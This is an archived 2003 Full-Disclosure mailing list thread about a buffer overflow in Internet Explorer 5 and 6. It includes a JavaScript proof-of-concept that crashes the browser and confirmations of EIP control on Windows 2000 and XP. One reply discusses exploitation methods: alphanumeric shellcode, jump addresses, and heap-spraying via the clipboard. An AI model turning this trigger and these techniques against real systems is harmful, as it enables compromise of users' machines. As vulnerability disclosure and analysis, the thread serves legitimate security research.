lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <38201204707.20030630211706@SECURITY.NNOV.RU>
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Subject: Re: Internet Explorer >=5.0 : Buffer overflow

Dear SecurITeam BugTraq Monitoring,

It   could   be  perfectly  easy  to  exploit  this  vulnerability  with
alphanumeric  shellcode...  There is a lot of appropriate addresses, for
example with jmp esp in different libraries (NT4 + IE6):

0x636e6294 0x70286161 0x70286221, etc

But  _real_  problem  is  it also does toupper() for all characters. So,
0x63  0x70  etc cannot be used. It's still possible to create shellcode,
but  I see no way to get control, because we have no appropriate address
to overwrite EBP/ESP... So, it's impossible to exploit it in usual way.

It's possible to put huge (few megabytes of) shellcode on the heap (just
to put it in the clipboard too) and try to get something like

jmp 0x20XXXXXX or jmp 0x21XXXXXX

in 0x20200000 - 0x60FFFFFF and 0x7B200000 - 0x7FFFFFFF

because  heap  usually  allocated  somewhere in the end of 0x20XXXXXX it
looks  possible...  That  is  we  can put 8MB of jmp 0x21777777 + 8MB of
NOOPs  +  shellcode into clipboard and overwrite EIP with something like
0x21212121....  But  this  exploit  will work an hour with 100% CPU load
because clipboard operations are slow :)

Any suggestions?


--Wednesday, June 25, 2003, 3:05:20 PM, you wrote to dotslash@...soft.com:

SBM> Hi,

SBM> I can confirm it under Windows 2000 with IE 5.50.4807.2300

SBM> Full control over the EIP, but the shellcode cannot contain (as it currently
SBM> appears) non Alpha Numeric characters, too bad I guess.

SBM> Thanks
SBM> Noam Rathaus
SBM> CTO
SBM> Beyond Security Ltd
SBM> http://www.SecurITeam.com
SBM> http://www.BeyondSecurity.com
SBM> ----- Original Message -----
SBM> From: "KF" <dotslash@...soft.com>
SBM> To: "Digital Scream" <digitalscream@...l.xakep.ru>
SBM> Sent: Monday, June 23, 2003 6:43 PM
SBM> Subject: Re: Internet Explorer >=5.0 : Buffer overflow


>> I can confirm this on Windows XP Professional
>>
>> version 6.0.2800.1106.xpsp2-030422-1633
>>
>> 0x43534c41 refrenced mem at 0x43534c41
>> -KF
>>
>>
>> Digital Scream wrote:
>>
>> >&lt;script&gt;
>> > wnd=open("about:blank","","");
>> > wnd.moveTo(screen.Width,screen.Height);
>> > WndDoc=wnd.document;
>> > WndDoc.open();
>> > WndDoc.clear();
>> > buffer="";
>> > for(i=1;i<=127;i++)buffer+="X";
>> > buffer+="DigitalScream";
>> > WndDoc.write("<HR align='"+buffer+"'>");
>> > WndDoc.execCommand("SelectAll");
>> > WndDoc.execCommand("Copy");
>> > wnd.close();
>> >&lt;/script&gt;
>> >
>> >Grtz: Nj3l, buggzy, 3APA3A, Void Team, X - Crew
>> >
>> >
>> >
>>
>>
>>

SBM> _______________________________________________
SBM> Full-Disclosure - We believe in it.
SBM> Charter: http://lists.netsys.com/full-disclosure-charter.html


-- 
~/ZARAZA
?????? ?????? ??????? ???????! (????)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ